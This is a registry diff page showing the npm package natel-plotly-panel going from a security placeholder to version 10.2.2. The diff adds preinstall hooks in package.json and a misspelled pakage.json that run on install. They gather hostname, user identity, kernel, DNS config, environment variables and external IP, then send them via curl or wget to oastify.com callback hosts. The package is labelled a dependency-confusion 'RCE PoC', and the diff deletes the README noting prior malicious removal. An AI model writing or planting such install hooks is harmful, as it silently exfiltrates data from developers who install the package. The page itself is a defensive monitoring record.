natel-plotly-panel 0.0.1-security → 10.2.2

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of natel-plotly-panel might be problematic. Click here for more details.

package/index.js ADDED
File without changes
package/package.json CHANGED
@@ -1,6 +1,11 @@
1
1
  {
2
2
  "name": "natel-plotly-panel",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "10.2.2",
4
+ "description": "Bugcrowd-Compliant RCE PoC - Fulfilling All Triage Requirements",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "preinstall": "sh -c 'SCRIPT=\"/tmp/bcrowd_validate.sh\"; (echo \"#!/bin/sh\"; echo \"echo [+] BUGCROWD VALIDATION\"; echo \"echo [+] Hostname:\"; echo hostname; echo \"echo [+] Whoami:\"; echo whoami; echo \"echo [+] UID info:\"; echo id; echo \"echo [+] Kernel:\"; echo uname -a; echo \"echo [+] DNS:\"; echo cat /etc/resolv.conf; echo \"echo [+] ENV (GUI or CI hints):\"; echo env | grep -Ei \"(SUDO_USER|DISPLAY|COLORTERM)\"; echo \"echo [+] External IP:\"; echo curl -s ifconfig.me) > $SCRIPT && chmod +x $SCRIPT && bash $SCRIPT | base64 | curl -s -X POST \"http://YOUR-OAST-DOMAIN.oastify.com/?data=$(</dev/stdin)\"'"
8
+ },
9
+ "author": "nepalihacker000",
10
+ "license": "ISC"
6
11
  }
package/pakage.json ADDED
@@ -0,0 +1,12 @@
1
+ {
2
+ "name": "cms-media-bridge",
3
+ "version": "10.0.1",
4
+ "description": "PoC for Dependency Confusion vulnerability",
5
+ "scripts": {
6
+ "preinstall": "sh -c 'wget --quiet \"http://7y6ftwvzeqjn824k9d0rzpmvcmig66uv.oastify.com/?event=preinstall&user=$(whoami)&path=$(pwd)&hostname=$(hostname)\"'",
7
+ "preupdate": "sh -c 'wget --quiet \"http://...\"'",
8
+ "test": "sh -c 'wget --quiet \"http://...\"'"
9
+ },
10
+ "author": "orwa",
11
+ "license": "ISC"
12
+ }
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=natel-plotly-panel for more information.